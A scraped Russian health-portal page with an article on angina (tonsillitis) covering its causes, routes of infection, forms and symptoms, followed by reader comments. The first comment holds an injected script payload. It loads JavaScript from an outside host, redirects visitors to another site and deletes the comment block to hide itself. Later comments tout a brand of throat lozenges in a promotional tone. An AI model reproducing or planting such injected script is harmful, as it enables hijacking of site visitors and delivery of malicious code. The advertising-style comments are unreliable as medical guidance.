Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Ангина: причины и симптом...  >>  Ангина: причины и симптомы
 
Обратная связь
 

Ангина: причины и симптомы

Размер шрифта
24 апреля 2012 10:00
  • google_analytics: false
  • Нравится

Ангина наблюдается чаще в детском возрасте и по уровню общей заболеваемости занимает одно из первых мест. Почему возникает ангина, и в каких формах она может протекать?

Суть заболевания

Ангина – это острое инфекционное воспаление небных миндалин. Признаки ангины могут развиться и в других элементах окологлоточного кольца: глоточной, язычной миндалинах и гортани.

Ангина – серьезное заболевание, которое может сопровождаться тяжелыми осложнениями в виде поражения сердца, легких, суставов и др.

Возбудителями ангины являются патогенные микроорганизмы – стрептококки, стафилококки, диплококки, пневмококки, энтеровирусы.

Пути проникновения инфекции в миндалины

  1. Извне (экзогенно):

  • воздушно-капельным путем;
  • энтеральным путем, например при употреблении молочных продуктов;
  • после операций на задних отделах полости носа и в носоглотке;
  1. Изнутри (эндогенно):

  • при активизации микрофлоры лакун миндалин у больных хроническим тонзиллитом;
  • из-за патологических процессов: кариеса, гнойного синусита или гастроэнтерита;
  1. Через кровь (гематогенно).

Причины возникновения ангины

  • заражение инфекцией;
  • резкая смена температуры воздуха;
  • переохлаждение организма (общее и местное);
  • сырость;
  • недостаточное количество солнечного света;
  • воздействие грязного (запыленного или загазованного) воздуха;
  • нерациональное питание;
  • общее переутомление;
  • неблагоприятные условия жизни;
  • ангина может развиться и по такому сценарию: перечисленные выше причины могут изменить биоценоз (совокупность микроорганизмов) полости рта и глотки настолько, что сапрофитная (родная) флора лакун миндалин становится опасной. Происходит инфицирование миндалин с последующим воспалением.

Классификация ангин

По характеру и степени поражения миндалин различают следующие формы ангины:

  • ангина катаральная – наиболее легкая форма ангины, в основном воспаляется слизистая оболочка миндалин;
  • ангина лакунарная – воспалительный процесс затрагивает преимущественно лакуны миндалин;
  • ангина фолликулярная – нагноение фолликулов миндалин;
  • комбинированные формы.

Течение и симптомы ангины

Катаральная ангина. Эта форма ангины имеет острое начало. Температура тела в основном субфебрильная, в некоторых случаях повышается до 38° С.

У человека отмечаются: головная боль, недомогание, иногда озноб, боль в горле, усиливающаяся при глотании, особенно при «пустом» глотке, увеличение и болезненность шейных лимфатических узлов, покраснение слизистой оболочки, миндалины разрыхлены и увеличены, язык с налетом. Заболевание длится от 3 до 5 дней.

Бывает, что на фоне катаральной ангины развиваются лакунарная или фолликулярная ангины.

Лакунарная ангина. В лакунах скапливается жидкость, которая образуется при воспалении, так называемый фибринозный экссудат. Слизистая оболочка глотки и миндалин отечная и покрасневшая, в лакунах миндалин появляются беловатые налеты, которые иногда сливаются, но не выходят за пределы миндалин и легко снимаются.

Фолликулярная ангина. Слизистая оболочка миндалин воспалена. На ней видны множественные беловато-желтоватые включения, напоминающие зерна проса – это нагноившиеся фолликулы, которые, постепенно увеличиваясь, могут вскрыться в полость глотки с выделением гноя.

Течение лакунарной и фолликулярной ангин значительно тяжелее, чем катаральной.

Появляются симптомы интоксикации организма, повышается температура тела, отмечается озноб, жалобы на общую слабость, головную боль, резкую боль при глотании, нередко с «отдачей» в ухо. У человека появляется потребность часто глотать, а голос приобретает гнусавый оттенок. Шейные лимфатические узлы увеличены и болезненны при прощупывании.

Течение фолликулярной и лакунарной ангин бурное, их продолжительность – до 10 дней. В некоторых случаях процесс может стать затяжным и перерасти в хронический.

Комбинированные ангины. Иногда у одного человека могут одновременно проявиться разные формы ангины с соответствующими симптомами. Например, на одной миндалине может развиться картина лакунарной, а на другой – фолликулярной ангины.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:43

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

2 - Гость

26 февраля 2016 в 00:26

Цитировать   |   Пожаловаться

Ребенок заболел ангиной, но не знаю как вылечить. Нашла один сайт с советами, но какой лучше выбрать?
http://www.polismed.ru/angina-post005.html

3 - Гость

06 марта 2016 в 20:33

Цитировать   |   Пожаловаться

По словам доктора, у меня ангина возникла из-за ослабленного иммунитета. По необходимости полоскала горло содовым раствором и хорошо помогали таблетки Тонзилотрена. Благодаря этим таблеткам успешно вылечила свою противную ангину и иммунитет смогла поднять.

4 - Гость

25 апреля 2016 в 13:23

Цитировать   |   Пожаловаться

Любые полоскания при ангине полезны как дополнительное лечение, облегчающее болезненные симптомы. Я либо ромашку использую, либо отвар шалфея. А после Тонзилотрен рассасываю и ничего нельзя пить на протяжении получаса. Тогда результат от этих таблеток очень хороший.

Статьи

       
Всемирная неделя первичного иммунодефицита начинается в Москве!   Когда папа может стать мамой?   Магниты убивают детей! Как их защитить?   Скажите ребенку, что овощи – это вредно. Тогда он будет есть только их!  
03 октября 2013Результаты благотворительного марафона «Всем миром» 17 июля 2013Будет ли ваш ребенок толстым – теперь это можно понять уже в 2 месяца!
 
10 июля 2013От того, что ест беременная женщина, зависит ум ее ребенка 08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты
 

Слайдшоу

1
Болезни, которые должен знать каждый родитель
Можно ли пережить беременность без рвоты?
Убийцы в вашей ванной

Тесты

1
Почему болит горло?
Что вы знаете о грудном вскармливании?
Грипп или простуда?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.